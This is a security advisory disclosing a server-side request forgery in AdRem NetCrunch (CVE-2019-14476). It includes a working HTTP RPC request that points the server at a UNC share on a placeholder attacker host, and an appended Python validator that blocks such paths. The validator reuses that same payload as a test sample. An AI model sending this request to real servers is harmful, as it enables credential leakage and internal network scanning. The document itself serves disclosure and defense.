################################################################################
#
# COMPASS SECURITY ADVISORY
# https://compass-security.com/en/research/advisories
#
################################################################################
#
# Product:  NetCrunch
# Vendor:   AdRem
# CSNC ID:  CSNC-2019-011
# CVE ID:   CVE-2019-14476
# Subject:  Server-Side Request Forgery (SSRF)
# Risk:     Medium
# Effect:   Remotely exploitable
# Authors:  Thierry Viaccoz
#           Sylvain Heiniger
#           Fabio Poloni
# Date:     26.07.2019
#
################################################################################

Introduction:
-------------

NetCrunch [1] is a so-called "agentless" monitoring solution developed by
AdRem. It allows system administrators to monitor, visualize and get alerts
from many kinds of systems in their network. The solution consists of a server
and a fat client (also called console), as well as a web client.

Due to its architecture, the monitoring server is a critical system, as it
holds credentials, most of the time privileged ones, for all monitored systems.

Compass Security identified a Server-Side Request Forgery (SSRF) vulnerability
in the AdRem NetCrunch server. Successful exploitation requires authenticating
as a user and can be performed remotely.

Affected:
---------

Initially vulnerable:
 * AdRem NetCrunch 10.6.0.4587

Not vulnerable:
 * AdRem NetCrunch 10.6.1.4607

No other version was tested, but it is believed that older versions are also
vulnerable.

Technical Description:
----------------------

Every user can trick the server into performing SMB requests to other systems.
An attacker can exploit this to get access to internal files. Furthermore, this
can be abused to perform limited internal network scans. Based on the returned
error messages and the time required to perform a request to a certain target,
the attacker may determine whether a given system exists and whether it is
running a web application.
Request to open the share "\\some-attacker\share\" on the attacker's machine:

POST /ncsrv/dashboards/summary/rpc?api=ncsrv&sid=2120819038 HTTP/1.1
Host: some-server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 129
Cookie: WASessionId=2120811535
Connection: close

[{"action":"IServerFilesBrowse","method":"GetContentOfDirectory","data":["\\\\some-attacker\\share\\","",-1],"type":"rpc","tid":2}]

Response showing that the request was triggered:

HTTP/1.1 200 OK
Connection: close
Content-Type: text/json; charset=UTF-8
Content-Length: 159
Cache-control: no-cache
Date: Wed, 31 Jul 2019 17:19:10 GMT
Pragma: no-cache
Server: AdRem WebApp Server

[{"type":"rpc","tid":2,"action":"IServerFilesBrowse","method":"GetContentOfDirectory","result":{"Directory":{"Name":"\\\\some-attacker\\share\\","Content":[]}}}]

By performing the request above, an SMB connection is opened from the NetCrunch
server to the host some-attacker.

Workaround / Fix:
-----------------

Avoid using user input as a source for the target of a request or prevent
access to this functionality if possible.

As a NetCrunch customer, update your installation to the latest version to
receive the fix.

Timeline:
---------

2019-05-23: Discovery by Thierry Viaccoz, Sylvain Heiniger and Fabio Poloni
2019-08-01: Assigned CVE-2019-14476
2019-08-29: Initial vendor notification
2020-12-08: Coordinated public disclosure date

References:
-----------

[1] https://www.adremsoft.com/
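The "Workaround / Fix" section advises not to use user input as the target of a server-side request. The following is an added example (it is not code from the advisory or from AdRem) of the server-side check a file-browse RPC such as GetContentOfDirectory would need: the directory argument is refused when it names a remote location (UNC share, forward-slash UNC, \\?\UNC device path or a URL-style target) and otherwise must resolve inside a single allow-listed local root. The root path, the two sample RPC bodies and the function names are constructed assumptions for the example; the envelope layout mirrors the request shown above.

```python
import json
import ntpath

# Constructed assumption: the only local directory the file-browse RPC may expose.
ALLOWED_ROOT = r"C:\ProgramData\NetCrunch\Exports"


def is_remote_path(path: str) -> bool:
    """Return True when a Windows path would make the server reach out to another host.

    Covers UNC paths (\\\\host\\share), forward-slash UNC (//host/share),
    device-path UNC (\\\\?\\UNC\\host\\share) and URL-style targets (smb://host/...).
    """
    p = path.strip()
    if p.startswith(("\\\\", "//")):
        return True
    # ntpath.splitdrive returns the "\\host\share" part as the drive of a UNC path.
    drive, _ = ntpath.splitdrive(p)
    if drive.startswith(("\\\\", "//")):
        return True
    # A scheme longer than one letter followed by "//" looks like a URL, not a drive letter.
    scheme, sep, rest = p.partition(":")
    return bool(sep and len(scheme) > 1 and scheme.isalpha()
                and rest.startswith(("//", "\\\\")))


def resolve_under_root(path: str, root: str = ALLOWED_ROOT):
    """Return the normalised path if it stays inside root, otherwise None.

    Joining and normalising first means ".." segments and absolute paths
    supplied by the client are collapsed before the prefix comparison.
    """
    if is_remote_path(path):
        return None
    candidate = ntpath.normpath(ntpath.join(root, path))
    root_n = ntpath.normcase(ntpath.normpath(root))
    cand_n = ntpath.normcase(candidate)
    if cand_n == root_n or cand_n.startswith(root_n + "\\"):
        return candidate
    return None


def check_rpc_envelope(body: str) -> list:
    """Inspect a NetCrunch-style RPC envelope and return one verdict per call.

    Only IServerFilesBrowse/GetContentOfDirectory calls are evaluated; the first
    element of "data" is the directory argument, as in the advisory's request.
    """
    verdicts = []
    for call in json.loads(body):
        if (call.get("action") != "IServerFilesBrowse"
                or call.get("method") != "GetContentOfDirectory"):
            verdicts.append({"tid": call.get("tid"), "verdict": "ignore"})
            continue
        data = call.get("data") or [""]
        target = data[0] if isinstance(data[0], str) else ""
        resolved = resolve_under_root(target)
        verdicts.append({
            "tid": call.get("tid"),
            "target": target,
            "verdict": "allow" if resolved is not None else "deny",
            "resolved": resolved,
        })
    return verdicts


# Constructed sample bodies: the UNC target from the advisory and a benign relative path.
SSRF_BODY = r'[{"action":"IServerFilesBrowse","method":"GetContentOfDirectory","data":["\\\\some-attacker\\share\\","",-1],"type":"rpc","tid":2}]'
BENIGN_BODY = r'[{"action":"IServerFilesBrowse","method":"GetContentOfDirectory","data":["reports","",-1],"type":"rpc","tid":3}]'


if __name__ == "__main__":
    for body in (SSRF_BODY, BENIGN_BODY):
        for verdict in check_rpc_envelope(body):
            print(verdict)
```

The check is deliberately layered: the remote-path test stops the SMB round trip described in the advisory before any path arithmetic happens, and the root-prefix comparison then blocks local traversal (`..\..\Windows`, absolute drive paths) so the same RPC cannot be turned into an arbitrary local directory listing. Denied calls are a useful detection signal in their own right and belong in the server's audit log together with the session that issued them.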